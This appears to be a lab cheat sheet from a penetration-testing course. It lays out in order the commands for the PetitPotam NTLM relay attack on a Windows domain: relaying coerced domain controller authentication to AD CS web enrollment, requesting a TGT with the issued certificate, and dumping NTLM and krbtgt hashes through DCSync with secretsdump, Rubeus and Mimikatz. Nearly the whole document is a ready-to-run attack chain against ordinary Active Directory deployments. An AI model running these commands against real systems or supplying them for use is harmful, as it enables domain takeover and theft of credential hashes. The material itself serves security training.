PetitPotam

PetitPotam is an NTLM relay attack that forces authentication from a Windows server, which can then be exploited to gain privileged access to a domain controller.

1. Clone PetitPotam Exploit Repository

Command:

git clone https://github.com/topotam/PetitPotam.git

• Description: Used to clone the PetitPotam exploit using Git. Performed from a Linux-based host.

---

2. Set Up NTLM Relay Attack

Command:

sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMYEA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController

• Description: Impacket tool used to create an NTLM relay by specifying the web enrollment URL for the Certificate Authority host. Performed from a Linux-based host.

---

3. Execute PetitPotam Attack

Command:

python3 PetitPotam.py 172.16.5.225 172.16.5.5

• Description: Executes the PetitPotam exploit by specifying the IP address of the attack host (172.16.5.225) and the target Domain Controller (172.16.5.5). Performed from a Linux-based host.

---

4. Request TGT Ticket for Domain Controller

Command:

python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 <base64 certificate> = dc01.ccache

• Description: Uses gettgtpkinit.py to request a TGT ticket for the Domain Controller (dc01.ccache) from a Linux-based host.

---

5. Perform DCSync Attack to Extract NTLM Hashes

Command:

secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -nopass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

• Description: Impacket tool used to perform a DCSync attack and retrieve one or all of the NTLM password hashes from the target Windows domain. Performed from a Linux-based host.

---

6. View Contents of CCache File

Command:

klist

• Description: krb5-user command used to view the contents of the ccache file. Performed from a Linux-based host.

---

7. Extract NT Hash from Ticket

Command:

python /opt/PKINITtools/getnthash.py -key <key> INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$

• Description: Used to submit TGS requests using getnthash.py from a Linux-based host.

---

8. Extract Hashes Using DCSync Attack

Command:

secretsdump.py -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes <hash>

• Description: Impacket tool used to extract hashes from NTDS.dit using a DCSync attack and a captured hash. Performed from a Linux-based host.

---

9. Perform Pass-the-Ticket Attack with Rubeus

Command:

.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /<base64 certificate>=/ptt

• Description: Uses Rubeus to request a TGT and perform a pass-the-ticket attack using the machine account of a Windows target. Performed from a Windows-based host.

---

10. Perform DCSync Attack Using Mimikatz

Command:

mimikatz # lsadump::dcsync /user:inlanefreight\krbtgt

• Description: Performs a DCSync attack using Mimikatz. Performed from a Windows-based host.